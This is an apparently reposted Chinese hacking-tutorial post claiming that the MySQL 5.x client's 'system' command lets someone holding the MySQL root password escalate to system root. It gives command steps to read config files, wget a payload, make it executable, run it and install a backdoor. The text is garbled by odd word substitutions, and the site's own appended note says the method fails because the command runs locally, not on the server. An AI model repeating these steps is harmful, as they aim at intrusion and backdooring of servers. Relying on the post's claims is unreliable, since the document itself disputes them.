最新linux提权之mysql的root权限通过system函数提权
环境下,mysql以root权限登录时提权    mysql5.x 的linux版本下面有一个函数,可以协助我们干无数猥琐的事情,这个函数4。x下面貌似没有,本来向来没发觉,也没去查函数手册,就我自己的阅历来写点东西。4,x的 明天再看看函数手册,再装一个试验一下。    mysql 5.x里面引入了一个system函数,这个函数可以执行系统,当mysql以root登陆的时候,就可以利用这个函数执行指令,固然是在权限许可的 范围内。    普通我们根据常规思路,搞到mysql的root密码之后,我们都会衔接上去,创建一个表,然后out,搞到一个webshell ,然后提权如斯这般。今日我们换一种方式。    根据上面的办法,我们需要知道web的肯定路径,固然这个很不好,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 根据我的的办法,没有须要再去web路径了,挺直执行    mysql system vi /etc//f;  挺直这样就可以到web的路径,固然,我们的目的并不是web路径,放webshell进去。我们是要来做其他的事情,好比,下载p执行, 搞到 root权限,然后装后门      mysql system wget  ;    mysql system  +x xxxx;    mysql system ./xxxx;    这样mysql的root此时就成为system的root了,剩下的事情,如果开了ssh,就ssh衔接上去,输入mysql的用户密码,ok,搞 定。  ~~~~~~~~~~~~~~~~~~~~~~~~~~`  此办法经本站测试是不管用的,执行指令是在
mysql下载教程视频本地执行,而非远程服务器. 比如 执行 system ; 则列出本地服务器文件  此文章网上流传无数,只是转来给大家提供一种思路,也可能是我测试有问题。仁者见仁,智者见智。请大家把测试结果留言在下面,共同沟通。  更多LINUX提权视频和教程 请拜访

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。